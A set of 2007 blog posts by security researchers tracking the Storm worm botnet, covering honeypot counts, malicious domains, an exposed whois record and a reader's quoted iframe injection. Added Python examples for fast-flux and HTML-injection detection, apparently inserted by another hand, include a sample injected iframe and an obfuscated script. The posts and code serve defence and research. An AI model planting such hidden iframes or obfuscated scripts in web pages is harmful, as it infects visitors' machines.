Friday, October 12, 2007

Some more CME711/STORM IPs and other statistics

There have been a number of requests in mailing lists and privately for the latest Stormworm numbers. It seems people like statistics.

Since Oct 1st, 2007 we've identified 4,149 unique IP addresses participating with our honeypots, either via p2p, in DDoS attacks, or spreading 'spa-m-alware' (mostly the latter, since our SMTP honeypot is set up to capture outgoing spam, and there is lots of it).

Additionally, our sensors have downloaded 7,202 Storm binaries, resulting in 4,661 uniquely hashed downloads since Oct 1st, 2007. A total of 43,897+ unique binaries have been captured to date.

The domains are slow to resolve again, some of them not responding at all. This is probably because the author is looking to spread the executable SuperLaugh.exe and is working to change his sites. SuperLaugh will be spammed using the ruse of 'a funny cat e-card.'

Lending an air of credibility to the scam, SuperLaugh.com, which is a valid e-card site, also has a file called SuperLaugh.exe, which is downloaded from http:// www.superlaugh.com/ icon/SuperLaugh.exe and has an MD5 sum of 571dd3cec20da6c70a3b62fa9f3637a8. Our anti-virus scanners say the legit file is harmless.

Malware Page:

Legit Page:

(The pages are both animations, the cat towards the front has a moving head, and both cats have cartoon balloons with scripted text)

In addition to the static HTML code, the authors are also attaching the Mpack XOR'd JavaScript to the end of their pages. The JavaScript will attempt to exploit several old vulnerabilities in Windows and third-party software. It forces the download of file.php, a downloader.

It's still surprising to me how many ISPs are allowing these domains to resolve. The bad press coverage should be enough for the ISPs to start null-routing those domains. We're still getting activity on the following domains:
ptowl.com tibeam.com kqfloat.com snbane.com yxbegan.com wxtaste.com eqcorn.com bnably.com ltbrew.com

We received an email from someone we suspect was trying to take over the Storm botnet. When we did not provide him with the requested information, we believe he launched a JoeJob attack as described in the last blog entry.

We've seen researchers using TOR to capture binaries or communicate with the network, we see denial-of-service attacks on high-profile IPs, probably related to researchers' honeypots, and we suspect we've seen a few attempted takeover attacks.

The authors don't appear to be letting up. The change in malware file names tells me they are getting greedy or preparing for something big.

As more black hats investigate the CME711 code, the network will become more vulnerable to takeover attacks. I hope these guys cut their losses and start breaking down the net soon. I would hate to see such a large botnet in the hands of some second-rate script kiddie.



Thursday, September 06, 2007

Storm, meet Danchev - and SMTP Honeypots.

Dancho Danchev has been playing around with Storm's fast-flux network and created some neat pictures showing how dynamic this network actually is.

His blog post is located here: http://ddanchev.blogspot.com/2007/09/storm-worms-fast-flux-networks.html
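What "dynamic" means in practice is that a fast-flux domain hands out a changing set of A records with a very short TTL, spread across many unrelated networks (the infected drones acting as front-end proxies), while a normal site resolves to the same few addresses for hours. The following is an added example, not code from this blog or from Danchev's post, that turns repeated resolver snapshots into a per-domain summary and applies a simple rule. The snapshots, the domain names and the thresholds are constructed for illustration; the /16 prefix count stands in for "distinct networks" when no ASN data is at hand.

```python
"""Fast-flux scoring from repeated DNS answer snapshots (added example)."""
from collections import defaultdict
from ipaddress import ip_network

# Constructed resolver snapshots: (seconds since start, domain, TTL, A records).
# flux-example.test rotates through six addresses in three networks with a 30s TTL,
# stable-example.test never changes, cdn-example.test rotates inside one /16.
SNAPSHOTS = [
    (0,   "flux-example.test", 30, ["203.0.113.4", "198.51.100.9", "192.0.2.77"]),
    (60,  "flux-example.test", 30, ["203.0.113.4", "198.51.100.130", "192.0.2.200"]),
    (120, "flux-example.test", 30, ["203.0.113.250", "198.51.100.130", "192.0.2.200"]),
    (180, "flux-example.test", 30, ["203.0.113.250", "198.51.100.9", "192.0.2.77"]),
    (0,   "stable-example.test", 86400, ["192.0.2.10"]),
    (60,  "stable-example.test", 86400, ["192.0.2.10"]),
    (120, "stable-example.test", 86400, ["192.0.2.10"]),
    (180, "stable-example.test", 86400, ["192.0.2.10"]),
    (0,   "cdn-example.test", 60, ["198.51.100.20", "198.51.100.21"]),
    (60,  "cdn-example.test", 60, ["198.51.100.22", "198.51.100.23"]),
    (120, "cdn-example.test", 60, ["198.51.100.20", "198.51.100.21"]),
    (180, "cdn-example.test", 60, ["198.51.100.22", "198.51.100.23"]),
]


def summarize(snapshots):
    """Per-domain counts: unique IPs, unique /16 prefixes, minimum TTL and how
    often the answer set changed between consecutive polls."""
    by_domain = defaultdict(list)
    for ts, domain, ttl, ips in sorted(snapshots, key=lambda r: (r[1], r[0])):
        by_domain[domain].append((ttl, frozenset(ips)))
    summaries = {}
    for domain, rows in by_domain.items():
        all_ips = set().union(*(ips for _, ips in rows))
        # /16 is a crude stand-in for "different networks" without ASN lookups.
        prefixes = {ip_network(f"{ip}/16", strict=False) for ip in all_ips}
        changes = sum(1 for a, b in zip(rows, rows[1:]) if a[1] != b[1])
        summaries[domain] = {
            "polls": len(rows),
            "unique_ips": len(all_ips),
            "unique_prefixes": len(prefixes),
            "min_ttl": min(ttl for ttl, _ in rows),
            "answer_changes": changes,
        }
    return summaries


def is_fast_flux(summary, min_ips=5, min_prefixes=3, max_ttl=300):
    """Heuristic rule (thresholds are assumptions; tune them to your own resolver
    data): many addresses, across several networks, short TTL, and actual rotation.
    The prefix requirement keeps a CDN rotating inside one network from matching."""
    return (summary["unique_ips"] >= min_ips
            and summary["unique_prefixes"] >= min_prefixes
            and summary["min_ttl"] <= max_ttl
            and summary["answer_changes"] >= 1)


def flag_fast_flux(snapshots):
    """Sorted list of the domains the rule flags."""
    return sorted(d for d, s in summarize(snapshots).items() if is_fast_flux(s))


if __name__ == "__main__":
    for domain, s in summarize(SNAPSHOTS).items():
        print(f"{domain:22} {s}  flux={is_fast_flux(s)}")
```

Feeding this with real polls (one resolution per minute per watched domain, recording TTL and the A records) is enough to reproduce the kind of churn Danchev's pictures show; the rule is deliberately conservative, so a domain it flags deserves a look, while a domain it does not flag may still be flux with fewer front ends than the thresholds demand.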

DISOG has been running internal SMTP honeypots for Stormworm since around August 15th. Since that date we've captured over 22,000 unique IP addresses!

Today was a slow day, 1651 unique IPs in just under 6000 emails. Since September 1st, we've managed to capture over 4685 unique IP addresses.

(Note: many IPs have been cleaned already; they are posted here for historical purposes only.)


Friday, August 17, 2007

Quick Storm Update

We're seeing an increase in storm spam, one spam drop has received over 200 messages in the last 24 hours.

Most are targeted, and many look like they are trying to pass themselves off as casual messages, not just greeting cards.

All the Storm-infected systems we've visited recently are serving up the new Microsoft Data Access page. If you see this page, please close your browser immediately!

We've updated our stats; click on the links in previous posts for the updated lists of over 18,000 unique MD5s, 11,000 unique IPs, 486 name servers, and 418 open resolvers.

The tushove.com domain has been suspended, but 12 others still remain.


Saturday, August 11, 2007

Behold, the power of Storm

As expected, the Storm Botnet has been gaining strength over the last 6 weeks. Current estimates are in the hundreds of thousands, to a million drones.

Stormworm has been our primary focus over the last few weeks as well.

To date, DISOG has uncovered over:

14,376 unique Storm-related binaries,
3,118 unique Storm-serving IPs,
258 supernode peers,
85 unique nameservers,
and 13 fast-flux domains.

In total, we've identified 3420 unique IP addresses that have been under control of the stormworm author(s), and identifying themselves in one form or another. There are likely hundreds of thousands more drones that we are totally unaware of!

One of the Storm worm fast-flux domains appears not to be privacy hidden. I'm unclear if this is a slip-up or a setup, but it's interesting!

Domain Name: LTBREW.COM
Registrar: ESTDOMAINS, INC.
Whois Server: whois.estdomains.com
Referral URL: http://www.estdomains.com
Registrant:
Daniel Korwel (noviymoyma@yahoo.com)
N/A
Los-Angeles
CALI,53313
US
Tel. +1.3235212327


Keep posted, we will continue to update this page as we learn more.

Reader Comment (Pre-Site-Change:)

The following code was injected into 4 of my websites:
------------------------------------
"<iframe src="http://kqfloat.xxxcom/ind.php" alt="BYDLOSHKA"
height="1" width="1"></iframe>"
------------------------------------
Remove the xxx in the domain name to get the virus/trojan horse in
your computer.
They use several other domains to host the Virus or Trojan Horse. When
I check the Whois all were PrivacyProtected, except one. snlilac.com
shows the owner: http://www.whois.net/whois_new.cgi?d=snlilac&tld=com
When I search on "Daniel Korwel" in Google I found this news article.

Which tells me that the hack of my websites is part of this Storm Botnet.
So I assume they have expanded from email to infiltrating websites to spread out the Worm.
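The two injection patterns described on this page, the 1x1 remote iframe quoted in the comment above and the obfuscated JavaScript "attached to the end of their pages" mentioned in the October 12 post, are both easy to spot in a site's own HTML if you know what to look for. The following is an added example, not code from this blog or from the commenter, that scans a page for a hidden iframe whose source is another host and for a script block that is either appended after the document's closing tag or feeds a long escaped string to a decoder. The sample page, the domain injected-example.test and the escape-count threshold are constructed for illustration; the iframe in the sample mirrors the shape of the one quoted in the comment.

```python
"""Scan HTML for injected hidden iframes and appended/obfuscated scripts (added example)."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Calls that decode an escaped payload at run time; harmless on their own,
# suspicious when combined with a long run of %XX or \xXX sequences.
OBF_MARKERS = ("unescape(", "fromCharCode", "eval(")


class _Collector(HTMLParser):
    """Collect iframe attributes and script bodies, remembering whether a
    script began after the document's </html> (i.e. was tacked onto the end)."""

    def __init__(self):
        super().__init__()
        self.iframes = []
        self.scripts = []          # (body, started_after_html_close)
        self._html_closed = False
        self._in_script = False
        self._after_close = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append(dict(attrs))
        elif tag == "script":
            self._in_script, self._buf = True, []
            self._after_close = self._html_closed

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self.scripts.append(("".join(self._buf), self._after_close))
            self._in_script = False
        elif tag == "html":
            self._html_closed = True

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)


def _tiny(value):
    """True for a width/height attribute of 0 or 1 (optionally with a px suffix)."""
    m = re.fullmatch(r"\s*(\d+)\s*(px)?\s*", str(value or ""))
    return bool(m) and int(m.group(1)) <= 1


def suspicious_iframes(iframes, page_host):
    """Hidden (1x1 or display:none) iframes whose source lives on another host."""
    hits = []
    for a in iframes:
        src = a.get("src") or ""
        host = urlparse(src).hostname or page_host      # relative src -> same host
        style = (a.get("style") or "").replace(" ", "").lower()
        hidden = (_tiny(a.get("width")) and _tiny(a.get("height"))) or "display:none" in style
        if hidden and host != page_host:
            hits.append({"src": src, "host": host})
    return hits


def script_is_suspicious(body, after_html_close):
    """Flag a script appended after </html>, or one that hands a long escaped
    string (20+ %XX / \\xXX sequences, an assumed threshold) to a decoder call."""
    text = body.strip()
    if not text:
        return False
    if after_html_close:
        return True
    escaped = len(re.findall(r"%[0-9A-Fa-f]{2}|\\x[0-9A-Fa-f]{2}", text))
    return any(m in text for m in OBF_MARKERS) and escaped >= 20


def scan_html(html, page_host):
    """Return the suspicious iframes and scripts found in one page."""
    p = _Collector()
    p.feed(html)
    p.close()
    scripts = [
        {"after_html_close": after, "length": len(body.strip()),
         "markers": [m for m in OBF_MARKERS if m in body]}
        for body, after in p.scripts if script_is_suspicious(body, after)
    ]
    return {"iframes": suspicious_iframes(p.iframes, page_host), "scripts": scripts}


# Constructed sample: a legitimate page with a normal embed, an injected 1x1 iframe
# and an escaped script appended after </html> (it decodes to a document.write call).
SAMPLE_PAGE = """<html><head><title>Cat e-card</title></head>
<body>
<p>Hello!</p>
<script>document.getElementById('x');</script>
<iframe src="https://www.example.org/embed" width="300" height="200"></iframe>
<iframe src="http://injected-example.test/ind.php" alt="BYDLOSHKA" height="1" width="1"></iframe>
</body></html>
<script>eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%22%3c%69%66%72%61%6d%65%22%29'))</script>
"""

if __name__ == "__main__":
    print(scan_html(SAMPLE_PAGE, "www.example.org"))
```

Run over a site's saved pages (comparing against a known-good copy where one exists), this catches exactly what the commenter found: a hidden frame pulling a page from a domain the site never referenced, and a script that has no business sitting after the closing `</html>` tag.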
